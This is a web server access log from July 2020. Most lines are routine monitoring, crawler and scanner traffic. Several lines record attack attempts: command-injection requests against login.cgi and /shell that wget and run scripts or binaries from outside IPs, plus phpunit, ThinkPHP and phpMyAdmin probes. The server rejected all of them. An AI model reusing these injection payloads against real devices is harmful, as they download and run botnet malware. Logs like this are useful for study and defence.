212.91.246.72 - - [02/Jul/2020:13:21:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.134.27.193 - - [02/Jul/2020:13:22:13 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
213.7.245.105 - - [02/Jul/2020:13:22:29 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:22:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
213.7.245.105 - - [02/Jul/2020:13:22:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
115.73.173.91 - - [02/Jul/2020:13:23:05 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
213.7.245.105 - - [02/Jul/2020:13:23:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:23:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
213.7.245.105 - - [02/Jul/2020:13:23:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:24:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
213.7.245.105 - - [02/Jul/2020:13:24:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:25:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.134.53.209 - - [02/Jul/2020:13:25:58 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:26:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.201.150.102 - - [02/Jul/2020:13:27:18 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:27:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:28:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:29:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:30:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:31:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:32:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
14.188.95.141 - - [02/Jul/2020:13:33:00 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:33:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:34:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:35:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:36:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:37:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.135.71.232 - - [02/Jul/2020:13:38:18 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:38:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:39:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:40:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:41:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.64.177 - - [02/Jul/2020:13:42:26 +0200] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.175 - - [02/Jul/2020:13:42:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [02/Jul/2020:13:42:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:43:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:44:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
210.4.69.138 - - [02/Jul/2020:13:44:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
171.252.39.206 - - [02/Jul/2020:13:44:55 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
175.183.4.30 - - [02/Jul/2020:13:44:56 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
220.133.23.35 - - [02/Jul/2020:13:45:25 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:45:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.105.199.19 - - [02/Jul/2020:13:45:52 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:46:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.127.67.177 - - [02/Jul/2020:13:46:38 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
86.101.61.11 - - [02/Jul/2020:13:47:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
122.117.86.223 - - [02/Jul/2020:13:47:22 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:47:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:48:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.126.216.24 - - [02/Jul/2020:13:49:04 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:49:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:50:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:51:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.54.160.135 - - [02/Jul/2020:13:51:35 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
171.229.3.18 - - [02/Jul/2020:13:51:44 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
59.126.139.59 - - [02/Jul/2020:13:51:51 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:52:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:53:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.34.232.21 - - [02/Jul/2020:13:53:43 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:54:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:55:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
114.35.8.140 - - [02/Jul/2020:13:55:43 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:56:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:13:57:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.232.226.190 - - [02/Jul/2020:13:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
59.127.30.61 - - [02/Jul/2020:13:57:56 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:58:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.172.48.249 - - [02/Jul/2020:13:58:49 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:13:59:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.138.75.88 - - [02/Jul/2020:14:00:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; http://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.75.88 - - [02/Jul/2020:14:00:02 +0200] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; http://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.75.88 - - [02/Jul/2020:14:00:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; http://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.75.88 - - [02/Jul/2020:14:00:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; http://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
212.91.246.72 - - [02/Jul/2020:14:00:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:01:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.56.151 - - [02/Jul/2020:14:02:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:02:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.64.173 - - [02/Jul/2020:14:02:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.102.56.151 - - [02/Jul/2020:14:02:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
37.211.20.97 - - [02/Jul/2020:14:03:09 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
94.102.56.151 - - [02/Jul/2020:14:03:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:03:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.234.138 - - [02/Jul/2020:14:03:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:14:04:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:05:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.127.229.115 - - [02/Jul/2020:14:05:54 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:06:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.234.138 - - [02/Jul/2020:14:06:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:14:07:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.56.151 - - [02/Jul/2020:14:08:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
113.182.6.164 - - [02/Jul/2020:14:08:28 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:08:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.56.151 - - [02/Jul/2020:14:08:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
94.102.56.151 - - [02/Jul/2020:14:08:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
94.102.56.151 - - [02/Jul/2020:14:09:08 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:09:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.56.151 - - [02/Jul/2020:14:10:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:10:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.56.151 - - [02/Jul/2020:14:10:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
94.102.56.151 - - [02/Jul/2020:14:11:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:11:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:12:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.194.252 - - [02/Jul/2020:14:12:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:14:13:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:14:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:15:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:16:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.195.185.208 - - [02/Jul/2020:14:16:46 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
182.155.16.34 - - [02/Jul/2020:14:16:48 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:17:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:18:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.255.243.114 - - [02/Jul/2020:14:18:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
106.54.2.175 - - [02/Jul/2020:14:19:25 +0200] "GET /TP/public/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.54.2.175 - - [02/Jul/2020:14:19:25 +0200] "GET /TP/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.54.2.175 - - [02/Jul/2020:14:19:26 +0200] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.54.2.175 - - [02/Jul/2020:14:19:26 +0200] "GET /html/public/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.54.2.175 - - [02/Jul/2020:14:19:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
212.91.246.72 - - [02/Jul/2020:14:19:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:20:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:21:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:22:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:23:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:24:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:25:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.134.88.29 - - [02/Jul/2020:14:25:36 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
139.162.106.181 - - [02/Jul/2020:14:26:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "HTTP Banner Detection (https://security.ipip.net)"
212.91.246.72 - - [02/Jul/2020:14:26:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:27:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:28:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
189.113.189.45 - - [02/Jul/2020:14:29:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:14:29:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.248.33.135 - - [02/Jul/2020:14:29:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Jul/2020:14:30:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:31:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:32:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:33:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:34:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
61.2.176.64 - - [02/Jul/2020:14:34:39 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:35:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.126.18.119 - - [02/Jul/2020:14:36:16 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:36:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.216.42 - - [02/Jul/2020:14:37:02 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
142.93.216.42 - - [02/Jul/2020:14:37:03 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
142.93.216.42 - - [02/Jul/2020:14:37:03 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
142.93.216.42 - - [02/Jul/2020:14:37:03 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
142.93.216.42 - - [02/Jul/2020:14:37:03 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "ZmEu"
142.93.216.42 - - [02/Jul/2020:14:37:04 +0200] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "ZmEu"
188.242.7.1 - - [02/Jul/2020:14:37:21 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://45.95.168.126/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "Rift/2.0"
212.91.246.72 - - [02/Jul/2020:14:37:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:38:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:39:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
114.141.54.106 - - [02/Jul/2020:14:40:29 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86 HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [02/Jul/2020:14:40:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:41:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:42:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:43:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:44:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:45:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:46:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
114.35.6.140 - - [02/Jul/2020:14:47:03 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:47:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
171.239.242.27 - - [02/Jul/2020:14:48:08 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:48:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:49:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
36.229.50.76 - - [02/Jul/2020:14:50:29 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:14:50:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:51:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:52:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:14:53:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
129.144.224.27 - - [02/Jul/2020:14:54:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.224.27 - - [02/Jul/2020:14:54:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.224.27 - - [02/Jul/2020:14:54:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.224.27 - - [02/Jul/2020:14:54:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.224.27 - - [02/Jul/2020:14:54:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.224.27 - - [02/Jul/2020:14:54:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
